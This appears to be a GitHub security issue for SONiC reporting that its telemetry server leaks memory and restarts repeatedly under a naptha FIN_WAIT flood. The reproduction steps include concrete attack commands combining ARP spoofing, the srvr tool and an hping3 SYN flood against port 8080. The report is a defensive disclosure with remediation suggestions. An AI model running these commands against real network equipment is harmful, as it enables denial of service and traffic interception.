sonic-net / sonic-buildimage

Scripts which perform an installable binary image build for SONiC
Other
701 stars 1.35k forks source link

[security] Telemetry server susceptible to DoS attack #13490

Open jusherma opened 1 year ago

jusherma commented 1 year ago

Description

Performing a FIN_WAIT flood attack on the telemetry server causes it to continuously increase its memory consumption. After about 30 seconds, monit will notice the high memory utilization and start logging warnings to /var/log/syslog. After about 10 minutes, monit will restart the telemetry process entirely.

Steps to reproduce the issue:

  1. Topology consists of a SONiC router connected to a VM running Kali Linux with naptha installed. eth1 on Kali VM is connected directly to Ethernet0 on SONiC router, with the following IPs
Device Interface IP
Kali Linux eth1 172.31.0.1
SONiC Router Ethernet0 172.31.0.2
  1. The following commands are run (concurrently) in the Kali VM to initiate a FIN_WAIT flood attack:

    arpspoof -i eth1 -t 172.31.0.2 172.31.0.6 > /tmp/arpspoof 2>&1 & \
    srvr -SAa -i eth1 172.31.0.6 > /tmp/srvr 2>&1 & \
    hping3 172.31.0.2 -p 8080 -S -a 172.31.0.6 -i u10000 -q
  2. The warnings mentioned above are seen in /var/log/syslog within 30 seconds of the start of the attack. After about 10 minutes, the telemetry server gets restarted for the first time. The telemetry server/container will restart repeatedly every 10 minutes as long as the attack persists.

Describe the results you received:

Dec  3 03:23:56.483574 sonic INFO memory_checker: [telemetry]: Memory usage (483078963.2 Bytes) is larger than the threshold (419430400 Bytes)!

Dec  3 03:33:54.851735 sonic ERR monit[501]: 'container_memory_telemetry' status failed (3) -- [telemetry]: Memory usage (2661805981.696 Bytes) is larger than the threshold (419430400 Bytes)!
Dec  3 03:33:54.852363 sonic INFO monit[501]: 'container_memory_telemetry' exec: '/usr/bin/restart_service telemetry'
Dec  3 03:33:54.978859 sonic INFO restart_service: Resetting failed status of service 'telemetry' ...
Dec  3 03:33:55.023909 sonic INFO restart_service: Succeeded to reset failed status of service 'telemetry.service'.
Dec  3 03:33:55.024342 sonic INFO restart_service: Restarting service 'telemetry' ...

Describe the results you expected:

  1. DoS attack should not cause telemetry process to leak memory
  2. Telemetry server should not be listening to all interfaces--it should listen on management only
  3. Telemetry server should be disabled by default to reduce attack surfaces in systems that don't use it

Output of show version:

This was seen on 5c7c789, but was reproducible on all recent versions of SONIC that I tried.

Additional information you deem important (e.g. issue happens only occasionally):

See this paper for more information on naptha DoS attack: https://www.giac.org/paper/gcih/168/naptha-remote-dos-rs-denial-service-resources-starvation-attack/101321

Suggested remediation steps

The memory leak needs to be fixed in the telemetry server. Additionally, the telemetry server should not be listening on all interfaces by default. It probably shouldn't be enabled by default either.

As noted above, this attack happened via an interface meant for passing routed traffic--not the management interface. Reducing the number of interfaces listening for telemetry requests and disabling servers until the user manually enables it both would reduce the attack surface here.

gechiang commented 1 year ago

@qiluo-msft please help investigate and resolve the DDOS threat.